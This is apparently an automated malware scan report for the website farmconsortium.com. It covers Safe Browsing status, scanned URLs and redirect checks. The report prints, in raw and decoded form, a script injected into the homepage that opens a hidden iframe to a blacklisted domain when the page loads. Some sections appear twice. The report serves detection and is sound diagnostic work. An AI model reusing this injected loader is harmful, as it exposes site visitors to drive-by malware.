Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=farmconsortium.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://farmconsortium.com/ | 200 OK Content-Length: 180800 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } | ||
http://farmconsortium.com//j.maxmind.com/app/geoip.js/ | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://farmconsortium.com/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://pastebin.com/raw.php?i=VmZRdpjZ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 30 Jan 2015 18:34:32 GMT Location: /VmZRdpjZ Server: cloudflare-nginx Vary: Accept-Encoding Content-Type: text/plain; charset=utf-8 CF-RAY: 1b0fc39dd00c05c3-WAW Set-Cookie: __cfduid=de19ccb48d69d8a2c9eeaa1dc23916ac91422642871; expires=Sat, 30-Jan-16 18:34:31 GMT; path=/; domain=.pastebin.com; HttpOnly Set-Cookie: cookie_key=1; expires=Fri, 27-Feb-2015 18:34:32 GMT; Max-Age=2419200; path=/; domain=.pastebin.com Set-Cookie: realuser=1; expires=Sat, 31-Jan-2015 18:34:32 GMT; Max-Age=86400; path=/ X-Powered-By: PHP/5.5.5 | clean |
http://pastebin.com/vmzrdpjz | 404 Not Found Content-Length: 11774 Content-Type: text/html | clean |
http://pastebin.com/js/jquery.js | 200 OK Content-Length: 93433 Content-Type: application/x-javascript | clean |
http://pastebin.com/js/main_v1.js | 200 OK Content-Length: 8628 Content-Type: application/x-javascript | clean |
http://tags.expo9.exponential.com/tags/Pastebincom/Safe/tags.js | 200 OK Content-Length: 7393 Content-Type: application/x-javascript | clean |
http://pastebin.com/ | 200 OK Content-Length: 24822 Content-Type: text/html | clean |
http://pastebin.com/tools | 200 OK Content-Length: 44811 Content-Type: text/html | clean |
http://pastebin.com/api | 200 OK Content-Length: 41939 Content-Type: text/html | clean |
http://pastebin.com/archive | 200 OK Content-Length: 43806 Content-Type: text/html | clean |
http://tags.expo9.exponential.com/tags/Pastebincom/Unsure/tags.js | 200 OK Content-Length: 7393 Content-Type: application/x-javascript | clean |
http://pastebin.com/faq | 200 OK Content-Length: 23928 Content-Type: text/html | clean |
http://pastebin.com/trends | 200 OK Content-Length: 16761 Content-Type: text/html | clean |
http://pastebin.com/signup | 200 OK Content-Length: 15894 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: farmconsortium.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Jan 2015 18:34:27 GMT
Server: Apache
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
X-Pingback: http://farmconsortium.com/xmlrpc.php
GET / HTTP/1.1
Host: farmconsortium.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Jan 2015 18:34:27 GMT
Server: Apache
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
X-Pingback: http://farmconsortium.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: farmconsortium.com
Referer: http://www.google.com/search?q=farmconsortium.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: farmconsortium.com
Referer: http://www.google.com/search?q=farmconsortium.com
Result:
The result is similar to the first query. There are no suspicious redirects found.